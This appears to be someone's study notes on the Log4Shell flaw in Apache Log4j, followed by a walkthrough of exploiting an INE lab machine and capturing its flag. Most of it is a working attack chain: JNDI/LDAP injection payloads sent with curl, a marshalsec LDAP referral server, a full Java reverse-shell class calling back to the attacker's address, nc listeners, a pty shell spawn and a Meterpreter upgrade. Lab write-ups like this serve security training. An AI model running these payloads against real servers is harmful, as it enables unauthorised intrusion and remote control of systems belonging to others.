Log4j Vulnerability (Log4Shell)

Vul reported on 9/Dec/2021 on Apache Java Logging Lib: Log4J

Background:

1-A quick 3 min video to get what all the fuss is about from Marcus Hutchins:

2-reading:

• GOVCERT:

Zero-Day Exploit Targeting Popular Java Library Log4j

• More practical Demonstration from Sophos:

Log4Shell explained – how it works, why you need to know, and how to fix itNaked Security

-Interesting stuff on the wild with #interactsh also from Sophos:

Log4Shell Hell: anatomy of an exploit outbreakSophos News

check-out the GitHub page this tool is a must in the arsenal: https://github.com/projectdiscovery/interactsh

Tut Notes:

Check if the server is vul:

1- start a server/listener:

nc -nlvp 1234

2- send a request to the potential vul point:

curl "<url>?cmd=$\{jndi:ldap://<attacker_IP>:1234\}"

if you received a conn (respond) in nc then it's vul.

Know. Before it mattersCanarytokens

to discover over WAN use CanaryTokens DNS

Exploiting the vul in your own LDAP server:

• we will be using the following script to automate: https://github.com/kozmer/log4j-shell-poc

1- Setup the a LDAP server so we can interpret the response:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<attacker_IP>:8080/#Exploit"

#Exploit: is the name of the exploit we will creat.

• inside the poc.py there's the java code (in comment) copy it to a new Exploit.java file cuz this is the exploit. and fill in your String host="<attackerIP>"; int port = <nc_port>;

2-compiling the exploit:

javac Exploit.java -source 8 -target 8

-source: Java version

-target: JDK version

1 warning don't worry about it

3- Setup the server to host the Exploit:

python -m SimpleHTTPServer 8080

8080 cuz that's the port we setup our ldap on.

4-Setup a listener to receive the conn from the target once it's exploited:

nc -nlvp 9999

same port as the one in the Exploit.java

5-attack (sending the req):

curl '<target_url>?cmd=$\{jndi:ldap://<attacker_ip>:<ldap_port>/Exploit\}'

<ldap_port>: from step 1

no reason to provide the extension ldap knows it by itself.

🎉Now in nc you received a conn. and now you have a reverse shell.🎉

you can spawn a bash shell:

python -c 'import pty;pty.spawn("/bin/bash")'

and of course, you can upgrade to a meterpreter shell:

use multi/handler
set LHOST <attacker_ip>
set LPORT <port in java code>
run
background
session -u 1 <-this uses shell2meterpreter module

Solving INE Box:

INE

target: demo.ine.local

My IP: 192.10.137.2

Footprinting:

~# nmap -sV demo.ine.local

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-08 15:37 IST
Nmap scan report for demo.ine.local (192.10.137.3)
Host is up (0.0000090s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache Tomcat 8.5.3
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)

runs Apache Tomcat while by default it doesn't really depend on Log4j but it can be config:

https://lists.apache.org/thread/m3bhytsh3yrhsxvo98vcyx4q6w0m1d4v

Apache Jserv interesting but not tatrget here I know this ver is vul.

Checking for the vul:

nc -nlvp 1234

curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap:192.10.137.2:1234\}'

we got a respone in nc it's vul...😀

Time to exploit it:

• my LDAP:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.10.137.2:8080/#Exploit"

Listening on 0.0.0.0:1389

• nc lisnter:

nc -nlvp 9999

• Compiling the Java Exploit (RevShell):

import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;

public class Exploit {
  public Exploit() throws Exception {

    String host="192.10.137.2";
    int port=9999;
    String cmd="/bin/sh";
    
    Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
    
    Socket s=new Socket(host,port)
    
    InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
    OutputStream po=p.getOutputStream(),so=s.getOutputStream();

    while(!s.isClosed()) {

      while(pi.available()>0)
        so.write(pi.read());

      while(pe.available()>0)
        so.write(pe.read());

      while(si.available()>0)
        po.write(si.read());

      so.flush();
      po.flush();
      Thread.sleep(50);

      try {
        p.exitValue();
        break;
      }
      catch (Exception e){}
    };
    p.destroy();
    s.close();
  }
}

javac Exploit.java -source 8 -target 8

• server Hosting the Exploit:

python -m SimpleHTTPServer 8080

• exploit:

curl 'http://demo.ine.local/login?cmd=$\{jndi:ldap://192.10.137.2:1389/Exploit\}'

• Goal achived:

root@INE:~# nc -nlvp 9999
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.10.137.3.
Ncat: Connection from 192.10.137.3:46500.
ls
FLAG
tomcat8
cat FLAG
33fbfa01ec2f791096f13e01988a164e